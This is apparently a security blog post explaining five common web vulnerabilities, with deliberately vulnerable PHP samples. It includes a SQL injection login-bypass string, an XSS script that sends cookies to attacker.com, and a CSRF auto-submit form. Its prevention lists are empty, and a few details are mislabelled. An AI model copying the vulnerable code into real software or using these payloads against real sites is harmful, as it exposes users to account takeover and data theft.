Top 5 Web Application Vulnerabilities

Jul 21, 2023 6 min read

Web applications are constantly under attack from malicious actors. These attacks can be costly and disruptive, and they can even lead to the loss of sensitive data.

One of the most common ways that attackers target web applications is by exploiting vulnerabilities. Vulnerabilities are weaknesses in the code or design of a web application that can be exploited by attackers to gain unauthorized access to the application or its data.

In this post, we will discuss the top 5 web application vulnerabilities and how to protect your website from them.

1. SQL Injection

SQL injection is a type of attack that exploits security vulnerabilities by injecting malicious code into a web application’s SQL queries, which can then be used to gain unauthorized access to the application’s database.

Consider this PHP login form:

Php 
<?php
// Get username and password from POST variables
$username = $_POST['username'];
$password = $_POST['password'];

// Construct SQL query
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";

// Execute the query
$result = mysqli_query($connection, $query);

// Check if the login was successful
if (mysqli_num_rows($result) > 0) {
    // User is authenticated
} else {
    // Invalid username or password
}
?>

In the code above, the user-supplied username and password variables are directly concatenated into the SQL query. An attacker can exploit this vulnerability by manipulating the id parameter to inject malicious SQL code.

For instance, an attacker could input ' OR 1=1 —- as the username and leave the password field empty. The resulting query would be:

Sql 
SELECT * FROM users WHERE username = '' OR 1=1 - AND password = ''

Because the comment sequence (--) causes the remainder of the query to be ignored, this is equivalent to:

Sql 
SELECT * FROM users WHERE username = '' OR 1=1

Since 1=1 is always true, this modified query would return all the rows from the users table, effectively bypassing the login mechanism. The attacker would have successfully login to the page and more likely will steal more information.

How to prevent SQL injection attacks:

2. Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a type of injection attack in which malicious code is injected into a web page or application. The malicious code is then executed by the victim’s browser when they view the page or use the application.

XSS attacks can be used to steal cookies, session tokens, or other sensitive information from the victim. They can also be used to redirect the victim to a malicious website, or to execute arbitrary code on the victim’s computer.

Consider the following page with embedded PHP code that displays list of comments:

Php 
<!DOCTYPE html>
<html>
<head>
  <title>Comments</title>
</head>
<body>
  <h1>User Comments</h1>
  <?php
    // Fetch comments from the database
    $comments = fetchCommentsFromDatabase();

    // Display comments
    foreach ($comments as $comment) {
      echo "<p>" . $comment['text'] . "</p>";
    }
  ?>
</body>
</html>

The vulnerability lies in the fact that the comments are directly inserted into the HTML markup without any proper sanitization. An attacker can take advantage of this vulnerability by submitting a comment containing malicious JavaScript code.

For example, they might submit the following comment which has malicious Javascript code:

Html 
<script>
  // Malicious code to steal user data
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://attacker.com/steal?cookies=" + document.cookie, true);
  xhr.send();
</script>

When this comment is displayed on the page, the Javascript code within them will be executed in the context of other users’ browsers. It will copy the cookies from the victim’s browser and send them to the attacker’s own server.

There are a number of ways to prevent XSS vulnerabilities:

3. Broken Authentication and Session Management

Broken authentication and session management is a web vulnerability that can happen when the application does not properly authenticate users, or if it does not properly manage user sessions.

Some common issues include:

These vulnerabilities can have a serious impact on a web application. They can allow an attacker to steal sensitive data, such as credit card numbers or passwords. They can also allow an attacker to take control of a user’s account and perform unauthorized actions.

There are a number of steps that can be taken to prevent this vulnerability:

By taking these steps, web applications can help to protect themselves from broken authentication and session management vulnerabilities.

4. Cross-Site Request Forgery (CSRF)

Cross-site request forgery (CSRF) is a web vulnerability that allows an attacker to trick a victim into performing an unintended action on a web application. It occurs when an attacker tricks a user’s browser into making a request to the web application where the user is authenticated.

Consider the following page on a vulnerable website which allows users to update their email addresses:

Html 
<!DOCTYPE html>
<html>
<head>
  <title>Change Your Email</title>
</head>
<body>
  <h1>Change Your Email</h1>
  <form action="https://example.com/email/change" method="POST">
    <label for="email">New Email:</label>
    <input type="email" id="email" name="email" required>
    <button type="submit">Change Email</button>
  </form>
</body>
</html>

An attacker can create a malicious website that contains the Javascript code to perform CSRF attack:

Html 
<script>
  // Auto-submitting the form on load
  document.addEventListener('DOMContentLoaded', function() {
    const form = document.createElement('form');
    form.setAttribute('method', 'POST');
    form.setAttribute('action', 'https://example.com/email/change');

    const input = document.createElement('input');
    input.setAttribute('name', 'email');
    input.setAttribute('value', 'attacker@example.com');

    form.appendChild(input);
    document.body.appendChild(form);

    form.submit();
  });
</script>

The attacker could trick the victim to visit the malicious website by a phishing email. If the victim, who is also authenticated on the vulnerable website, visits the attacker’s website, the browser will execute the malicious code to change the email address on the vulnerable website.

Here are some of the best practices to prevent XSS attacks:

5. Insecure Direct Object Reference

This vulnerability is a type of access control vulnerability in which an attacker can access an object without proper authorization. This can happen if the web application uses user-supplied input to access an object directly, without first checking the user’s permissions.

Consider a simple web application that displays user profiles. Each user profile is associated with a unique ID, which is used in the URL to retrieve and display the corresponding user information. The vulnerable code might look like this:

Php 
<?php
// Get object reference from the URL parameter
$userID = $_GET['id']; 

$profile = getUserProfile($userID);
echo "User ID: " . $profile['id'];
echo "Username: " . $profile['username'];
echo "Email: " . $profile['email'];
?>

The code does not perform proper authorization checks and an attacker could manipulate the id parameter in the URL to access the profiles of other users, even if they are not intended to have access.

To prevent IDOR vulnerabilities, web applications should implement:

Key Takeaways

The web vulnerabilities shown in this post can be exploited by attackers to steal sensitive data, take control of user accounts, or disrupt the availability of a web application. It is important for web developers and site owners to take steps to prevent these vulnerabilities from being exploited.

By following the best practices outlined in this post, you can help to protect your web application from these and other vulnerabilities. However, it is important to stay up-to-date on the latest security threats and to regularly scan your website for vulnerabilities.